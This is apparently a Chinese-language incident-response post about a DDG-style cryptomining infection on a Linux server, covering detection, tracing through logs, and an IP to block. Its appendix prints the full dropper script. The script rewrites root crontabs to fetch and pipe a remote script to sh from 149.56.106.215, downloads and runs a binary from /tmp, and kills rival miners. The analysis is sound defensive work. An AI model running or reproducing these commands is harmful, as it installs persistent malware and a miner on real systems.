0、前言
咳咳,安全设备直接拉黑该IP的出入,防患于未然嘛,下文进行意识流派分析总结。
1、如何发现异常
机子异常,首先是从虚拟机管理工具发现CPU资源异常报警,判断机子里存在恶意进程占用资源。
进去机子敲打命令top查看进程资源占用top10,发现异常进程
锁定进程工作目录与恶意程序位置
删文件与Kill进程,恶意进程均死灰复燃。
脑袋一拍,随机查看计划任务。
1、计划任务
crontab -l命令查看计划任务:
curl -fsSL http://149.56.106.215:8000/i.sh | sh
wget -q -O- http://149.56.106.215:8000/i.sh | sh
3、入侵路径
1、应用漏洞
2、组件漏洞
3、系统漏洞
4、爆破
5、等等
总之,攻击者拥有了root权限写了个计划任务,攻击入口需要对相关安全日志,计划任务日志,应用服务日志等日志进行审计分析
4、大致溯源思路
1、查看crontab的日志定位最初一条计划任务执行时间
2、锁定好被植入计划任务时间,查看其他日志
3、secure可以对定位的时间查看有无爆破和异常登陆
4、web日志可以查看定位时间段内有无异常请求
5、总结
这是个情报共享,重点是IP:
149.56.106.215
拉入黑名单吧,记得出入都拉黑
6、附件
样本都在下面了,有需要自己下把
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill